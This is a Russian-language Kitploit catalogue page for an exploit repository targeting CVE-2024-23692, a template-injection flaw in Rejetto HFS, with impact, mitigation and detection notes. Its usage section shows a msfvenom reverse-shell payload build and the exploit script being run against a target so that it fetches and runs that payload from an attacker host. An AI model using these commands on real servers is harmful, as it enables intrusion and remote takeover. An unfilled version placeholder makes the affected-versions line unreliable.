Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-23692 — Rejetto HFS (HTTP File Server) — это простой веб-файловый сервер, который упрощает обмен файлами по сети или через интернет. | Kitploit
Инструменты/GitHubGitHub/mr-r00t11/cve-2024-23692
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubmr-r00t11/cve-2024-23692

CVE-2024-23692

Rejetto HFS (HTTP File Server) — это простой веб-файловый сервер, который упрощает обмен файлами по сети или через интернет.

Репозиторий
22 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость CVE-2024-23692 в Rejetto HFS (HTTP File Server)


Обзор

Rejetto HFS (HTTP File Server) — это простой веб-файловый сервер, который обеспечивает обмен файлами по сети или через интернет. Несмотря на простоту использования, в нём была обнаружена критическая уязвимость (CVE-2024-23692), делающая сервер целью для злоумышленников.


CVE-2024-23692: Уязвимость серверной инъекции шаблонов (SSTI)


Описание

CVE-2024-23692 — это уязвимость типа Server-Side Template Injection (SSTI), обнаруженная в Rejetto HFS. Данная уязвимость позволяет злоумышленнику внедрять и выполнять вредоносные шаблоны на сервере. При эксплуатации она может привести к удалённому выполнению кода, потенциально ставя под угрозу весь сервер и размещённые на нём данные.


Воздействие

Злоумышленник, эксплуатирующий эту уязвимость, может:

  • Выполнять произвольный код на сервере
  • Получать несанкционированный доступ к конфиденциальным данным
  • Нарушать целостность и доступность сервера
  • Использовать скомпрометированный сервер для проведения дальнейших атак в сети

Использование

Получите shell с помощью вредоносного бинарного файла, созданного в msfvenom.

Примечание: оставьте nc в режиме прослушивания.

root@kitploit:~
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

Выполните команду удалённо.

root@kitploit:~
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

Для отображения результата может потребоваться около 15 секунд.

[Screenshot_2.png]


Затронутые версии

Все версии Rejetto HFS вплоть до версии [укажите последнюю уязвимую версию] включительно подвержены данной уязвимости.


Меры по снижению риска

Чтобы снизить риск, связанный с CVE-2024-23692, пользователям рекомендуется:

  • Обновитесь до последней версии: Убедитесь, что вы используете версию Rejetto HFS, в которой эта уязвимость исправлена. Проверьте официальный сайт или репозиторий Rejetto HFS на наличие последних обновлений.
  • Применяйте лучшие практики безопасности: Ограничьте доступ к HFS-серверу только доверенными сетями и пользователями. Используйте надёжные механизмы аутентификации и авторизации.
  • Мониторинг и аудит: Регулярно отслеживайте необычную активность на сервере и проверяйте журналы на предмет признаков эксплуатации.

Обнаружение

Чтобы определить, был ли ваш сервер скомпрометирован, обратите внимание на:

  • Необычный сетевой трафик, исходящий от сервера
  • Неожиданные файлы или процессы на сервере
  • Несанкционированные изменения конфигурации или данных сервера

Сообщение о проблеме и поддержка

Для получения дополнительной помощи и поддержки обращайтесь к форумам сообщества Rejetto HFS или официальным каналам поддержки.


Ресурсы

  • Официальный сайт Rejetto HFS
  • Подробности о CVE-2024-23692

Лицензия

Этот проект лицензирован в соответствии с MIT License — подробнее см. в файле LICENSE.


Скачать инструмент